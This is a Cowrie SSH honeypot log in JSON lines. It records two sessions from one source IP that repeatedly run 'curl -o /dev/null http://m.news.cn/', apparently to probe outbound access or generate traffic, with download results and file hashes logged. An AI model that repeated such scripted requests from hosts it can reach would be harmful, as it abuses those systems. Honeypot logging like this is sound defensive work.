{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.106130Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.107848Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.108866Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.118365Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.119560Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.141221Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.149811Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.151327Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.161596Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.162914Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.173568Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.186139Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.187310Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.201245Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.202445Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.223791Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.225401Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.242376Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.243551Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.247021Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.263943Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.265383Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.270190Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.339698Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.341078Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.358475Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.359711Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.362456Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.389443Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.390811Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.401277Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.402561Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.404725Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.427933Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.430988Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.432317Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.440489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.441634Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.460812Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.474920Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.476330Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.478150Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.478964Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.495390Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.541024Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.542809Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.545658Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.546763Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.589614Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.591125Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.594963Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.595819Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.599682Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.602871Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.627126Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.628519Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.632607Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.633739Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.647870Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.649732Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.664192Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.665678Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.678224Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.679404Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.704512Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.705943Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.749830Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.751272Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.767971Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.769388Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.818449Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.838920Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.844450Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.845774Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.852051Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.853253Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.876712Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.879167Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.900172Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.901853Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.910764Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.911843Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.925746Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.927450Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.953970Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.955585Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.966314Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.968288Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.969799Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.971956Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.013889Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.015143Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.016844Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.018614Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.025402Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.026537Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.056473Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.057658Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.059244Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.067707Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.068671Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.102944Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.103863Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.105395Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.111031Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.111931Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.175380Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.176889Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.181538Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.182568Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.203166Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.204890Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.230446Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.231906Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.235958Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.236706Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.250221Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.269214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.270866Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.275767Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.277314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.346124Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.347220Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:31.352127Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:31.353273Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
